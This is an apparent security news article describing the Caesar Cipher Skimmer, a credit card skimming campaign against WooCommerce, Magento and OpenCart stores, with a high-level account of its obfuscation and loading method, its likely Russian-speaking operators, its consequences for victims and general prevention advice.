Caesar Cipher Skimmer

Several widely used Content Management Systems (CMS), such a Magento, WordPress and OpenCart, have recently encountered a novel credit card Web skimmer known as the Caesar Cipher Skimmer. This malware infiltrates e-commerce websites with the intention of covertly collecting financial and payment details.

The attack campaign specifically targeted the WooCommerce plugin for WordPress, where it manipulated the 'form-checkout.php' PHP file to extract credit card information. Researchers overseeing the situation have noted that the injected code has been altered to reduce its visibility by minimizing the obfuscation of the script.

The Caesar Cipher Skimmer May Be Deployed to Previously Compromised Sites

Specifically, it utilizes the same substitution mechanism employed in Caesar cipher to encode the threatening piece of code into a garbled string and conceal the external domain that's used to host the payload. It's presumed that all the websites have been previously compromised through other means to stage a PHP script that goes by the names 'style.css' and 'css.php' in an apparent effort to mimic an HTML style sheet and evade detection.

These scripts, in turn, are designed to load another obfuscated JavaScript code that creates a WebSocket and connects to another server to fetch the actual skimmer.

The script sends the URL of the current web pages, which allows the attackers to send customized responses for each infected site. Some versions of the second layer script even check if it is loaded by a logged-in WordPress user and modify the response for them.

The Operators of the Caesar Cipher Skimmer Are Likely Russian

Some versions of the script contain comments written in Russian, indicating that the threat actors behind the operation may be Russian-speaking.

The attack does not solely rely on modifying the 'form-checkout.php' file in WooCommerce; attackers have also exploited the legitimate WPCode plugin to inject the skimmer into website databases.

In Magento-based websites, JavaScript injections are found in database tables like core_config_data. The method used for OpenCart sites remains unknown at this time. Due to its widespread adoption as a website platform, WordPress and its extensive plugin ecosystem have become lucrative targets for malicious actors, providing them with ample opportunities for attacks.

It is necessary for website owners to regularly update their CMS software and plugins, maintain strong password practices, and conduct periodic audits to detect any suspicious administrator accounts.

Victims of a Skimmer Could Endure Serious Consequences

Credit card Web skimmers, also known as Magecart attacks or digital skimming, can have severe consequences for both consumers and businesses:

• Financial Losses: Skimmers harvest credit card details entered on compromised websites. This information is then used for fraudulent transactions, leading to direct financial losses for affected individuals.
• Identity Theft: Harvested credit card information can be used for identity theft purposes, including opening new accounts or making unauthorized purchases in the victim's name.
• Damage to Business Reputation: Companies that suffer a skimming attack may face damage to their reputation and loss of customer trust. Consumers may avoid shopping on websites that have experienced security breaches.
• Regulatory Penalties: Depending on the jurisdiction, businesses may be fined and get penalties for failing to protect customer data adequately. Submission to data protection regulations such as GDPR or CCPA may also be compromised.
• Operational Disruption: Mitigating the effects of a skimming attack requires significant resources and time. Businesses may need to temporarily shut down their websites or services to investigate and remediate the breach, leading to operational disruption and financial impact.
• Long-term Impact on Revenue: Even after mitigating a skimming attack, businesses may experience reduced customer traffic and sales as a result of the breach. Restoring customer confidence and rebuilding a positive reputation can be a long-term challenge.

In summary, credit card Web skimmers pose significant risks to both consumers and businesses, impacting financial stability, trustworthiness and regulatory compliance. Preventative measures, such as regular security audits, robust encryption practices, and prompt software updates, are essential to mitigate these risks and protect against such unsafe activities.